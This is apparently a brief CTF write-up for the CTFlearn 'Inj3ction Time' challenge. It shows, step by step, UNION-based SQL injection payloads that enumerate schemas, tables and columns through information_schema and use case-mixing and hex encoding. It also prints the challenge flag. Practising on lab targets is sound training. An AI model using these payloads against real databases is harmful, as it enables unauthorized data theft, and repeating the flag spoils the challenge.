SQL INJECTION 102 (Inj3ction Time CTFLEARN)

Introduction

abctf{uni0n_1s_4_gr34t_c0mm4nd}

Some of you might ask why exploit the vulnerability manually when we already have the flag??

I haven’t done OSCP yet and am planning on doing it once i have enough cash but i think OSCP doesn’t allow automated tools like SQLMap so if you find a lab that require the particular skillset of exploiting SQL Injection vulnerability you’ll have to exploit the vulnerability manually and that’s why we will be doing this whole process manually

SELECT Name, Breed, Color FROM dogs where id = "
SELECT Name, Breed, Color FROM dogs where id = "1"
SELECT Name, Breed, Color FROM dogs where id = "3""
SELECT Name, Breed, Color FROM dogs where id = '3''
2 UNION SELECT 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c),4 fRoM information_schema.schemata-- -
2 UNION SELECT 1,2,gRoUp_cOncaT(0x7c,table_name,0x7C),4 fRoM information_schema.tables wHeRe table_schema='webeight'-- -
2 UNION SELECT 1,2,gRoUp_cOncaT(0x7c,column_name,0x7C),4 fRoM information_schema.columns wHeRe+table_name=0x7730775f7930755f6630756e645f6d33-- -
UNION SELECT 1,2,gRoUp_cOncaT(0x7c,f0und_m3,0x7C),4 fRoM w0w_y0u_f0und_m3-- -
abctf{uni0n_1s_4_gr34t_c0mm4nd}

--

--

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store